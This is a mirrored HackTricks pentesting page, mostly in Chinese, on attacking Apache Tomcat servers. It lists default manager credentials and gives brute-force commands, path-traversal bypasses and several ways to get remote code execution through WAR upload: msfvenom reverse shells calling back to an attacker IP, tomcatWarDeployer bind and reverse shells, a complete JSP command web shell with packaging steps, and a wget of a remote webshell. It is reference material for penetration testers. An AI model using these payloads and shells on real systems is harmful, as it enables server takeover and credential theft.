Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-30 08:30:57 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/tomcat.md

16 KiB
Raw Blame History

Tomcat

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

发现最重要的漏洞以便更快地修复它们。Intruder跟踪您的攻击面运行主动威胁扫描发现整个技术堆栈中的问题从API到Web应用程序和云系统。立即免费试用

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

发现

  • 它通常运行在端口8080
  • 常见的Tomcat错误

枚举

版本

curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat

<html lang="en"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><link href="./images/docs-stylesheet.css" rel="stylesheet" type="text/css"><title>Apache Tomcat 9 (9.0.30) - Documentation Index</title><meta name="author"

定位管理文件

有趣的是找到页面 /manager/host-manager 的位置,因为它们可能有不同的名称。你可以使用暴力破解来搜索它们。

用户名枚举

在某些早于Tomcat6的版本中你可以枚举用户

msf> use auxiliary/scanner/http/tomcat_enum

默认凭据

Tomcat中最有趣的路径是_/manager/html_在这个路径下你可以上传和部署war文件执行代码。但是这个路径受基本的HTTP身份验证保护最常见的凭据有

  • admin:admin
  • tomcat:tomcat
  • admin:<NOTHING>
  • admin:s3cr3t
  • tomcat:s3cr3t
  • admin:tomcat

你可以使用以下方式测试这些凭据和更多凭据:

msf> use auxiliary/scanner/http/tomcat_mgr_login

另一个有趣的Tomcat路径是/manager/status您可以在此处查看操作系统和Tomcat的版本。当您无法访问/manager/html这对于查找影响Tomcat版本的漏洞非常有用。

暴力破解

hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST tomacat-site.internal
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts <IP>

漏洞

密码回溯泄露

尝试访问/auth.jsp,如果你非常幸运,它可能会在回溯中泄露密码

双重URL编码

一个众所周知的漏洞是使用CVE-2007-1860中的mod_jk来访问应用程序管理器它允许双重URL编码路径遍历

为了访问Tomcat的管理Web请转到pathTomcat/%252E%252E/manager/html

请注意为了上传Webshell您可能需要使用双重URL编码技巧并发送一个cookie和/或SSRF令牌。
为了访问后门您可能还需要使用双重URL编码技巧。

/examples

以下示例脚本随Apache Tomcat v4.x - v7.x一起提供并可供攻击者获取有关系统的信息。这些脚本也已知容易受到跨站脚本攻击XSS注入的攻击来自这里)。

  • /examples/jsp/num/numguess.jsp
  • /examples/jsp/dates/date.jsp
  • /examples/jsp/snp/snoop.jsp
  • /examples/jsp/error/error.html
  • /examples/jsp/sessions/carts.html
  • /examples/jsp/checkbox/check.html
  • /examples/jsp/colors/colors.html
  • /examples/jsp/cal/login.html
  • /examples/jsp/include/include.jsp
  • /examples/jsp/forward/forward.jsp
  • /examples/jsp/plugin/plugin.jsp
  • /examples/jsp/jsptoserv/jsptoservlet.jsp
  • /examples/jsp/simpletag/foo.jsp
  • /examples/jsp/mail/sendmail.jsp
  • /examples/servlet/HelloWorldExample
  • /examples/servlet/RequestInfoExample
  • /examples/servlet/RequestHeaderExample
  • /examples/servlet/RequestParamExample
  • /examples/servlet/CookieExample
  • /examples/servlet/JndiServlet
  • /examples/servlet/SessionExample
  • /tomcat-docs/appdev/sample/web/hello.jsp

路径遍历(..;/

在一些Tomcat的易受攻击配置中,您可以使用路径/..;/访问Tomcat中的受保护目录。

因此,例如,您可以通过访问www.vulnerable.com/lalala/..;/manager/html访问Tomcat管理器页面。

使用此技巧绕过受保护路径的另一种方法是访问http://www.vulnerable.com/;param=value/manager/html

RCE

最后如果您可以访问Tomcat Web应用程序管理器您可以上传和部署.war文件执行代码

限制

只有当您拥有足够的权限(角色:adminmanagermanager-script您才能部署WAR。这些详细信息通常在/usr/share/tomcat9/etc/tomcat-users.xml中定义(版本可能有所不同)(参见POST部分)。

# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed

# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"

# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"

Metasploit

Metasploit是一款广泛使用的渗透测试工具用于评估和验证系统的安全性。它提供了一系列功能强大的模块用于发现和利用系统中的漏洞。Metasploit可以用于测试Web应用程序、操作系统、网络设备等各种目标。

Metasploit的一个重要模块是exploit模块它包含了各种漏洞利用代码。通过选择合适的exploit模块渗透测试人员可以利用目标系统中的已知漏洞获取系统权限或执行任意代码。

Metasploit还提供了payload模块用于在目标系统上执行特定的操作。payload可以是一个简单的命令也可以是一个完整的shell。渗透测试人员可以根据需要选择合适的payload以实现特定的攻击目标。

Metasploit还支持post模块用于在渗透测试后对目标系统进行后期操作。这些操作可以包括数据收集、权限提升、持久性访问等。

总之Metasploit是一款功能强大的渗透测试工具可以帮助渗透测试人员发现和利用系统中的漏洞评估系统的安全性。

use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit

MSFVenom反向Shell

The MSFVenom tool is a powerful payload generator and encoder that is part of the Metasploit Framework. It allows you to create custom payloads for various exploits, including reverse shells.

To generate a reverse shell payload using MSFVenom, you can use the following command:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f war > shell.war

Replace <attacker IP> with your IP address and <attacker port> with the port number you want to use for the reverse shell connection.

This command will generate a Java Server Pages (JSP) payload that establishes a reverse TCP connection to your machine. The payload will be saved as a .war file named shell.war.

Once you have generated the payload, you can deploy it on a vulnerable server running Apache Tomcat or any other compatible web server. After successful deployment, you can trigger the reverse shell connection by accessing the deployed file through a web browser.

Remember to set up a listener on your machine to catch the incoming reverse shell connection. You can use tools like Netcat or Metasploit's multi/handler module for this purpose.

Keep in mind that using MSFVenom or any other hacking tool without proper authorization is illegal and unethical. Always ensure that you have the necessary permissions and legal rights before conducting any penetration testing activities.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.41 LPORT=80 -f war -o revshell.war

然后,上传revshell.war文件并访问它(/revshell/

使用tomcatWarDeployer.py进行绑定和反向shell

在某些情况下这种方法不起作用例如旧版本的sun

下载

git clone https://github.com/mgeeky/tomcatWarDeployer.git

反向 shell

A reverse shell is a type of shell in which the target machine initiates the connection to the attacker's machine. This allows the attacker to gain remote access to the target machine and execute commands. Reverse shells are commonly used in post-exploitation scenarios to maintain persistent access to a compromised system.

To establish a reverse shell, the attacker typically needs to exploit a vulnerability in a network service running on the target machine. Once the vulnerability is exploited, the attacker can inject malicious code that establishes a connection back to their machine.

There are various tools and techniques available for creating reverse shells, including using netcat, Python, or Metasploit. The choice of tool depends on the specific requirements of the penetration test and the target environment.

It is important to note that the use of reverse shells for unauthorized access to systems is illegal and unethical. Reverse shells should only be used in authorized penetration testing engagements or for educational purposes with proper consent and legal authorization.

./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/

绑定 shell

A bind shell is a type of shell that allows an attacker to gain remote access to a compromised system. It works by binding a shell to a specific port on the target system, allowing the attacker to connect to that port and gain control over the system.

To create a bind shell, the attacker needs to find a vulnerable service running on the target system that allows remote connections. One common target is the Apache Tomcat web server, which is often used to host Java-based web applications.

Once the attacker has identified a vulnerable service, they can exploit it to execute arbitrary commands on the target system. This can be done by injecting malicious code into the service or by exploiting a known vulnerability.

Once the attacker has gained access to the target system, they can use the bind shell to execute commands and interact with the system as if they were sitting in front of it. This can include tasks such as browsing files, modifying configurations, or even launching further attacks on other systems within the network.

It is important to note that using a bind shell to gain unauthorized access to a system is illegal and unethical. This information is provided for educational purposes only and should not be used for any malicious activities.

./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/

使用Culsterd

clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows

手动方法 - Web shell

创建名为 index.jsp 的文件,并使用以下内容

<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
}  catch(IOException e) {   e.printStackTrace();   }
}
%>
<pre><%=output %></pre>

mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
webshell.war is created
# Upload it

您还可以安装这个(允许上传、下载和执行命令):http://vonloesch.de/filebrowser.html

手动方法2

获取一个JSP Web Shell比如这个并创建一个WAR文件

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp

POST

Tomcat凭据文件的名称是 tomcat-users.xml

find / -name tomcat-users.xml 2>/dev/null

获取Tomcat凭据的其他方法

msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat

其他Tomcat扫描工具

找到最重要的漏洞以便您能更快地修复它们。Intruder跟踪您的攻击面运行主动威胁扫描发现整个技术栈中的问题从API到Web应用和云系统。立即免费试用

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

☁️ HackTricks云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥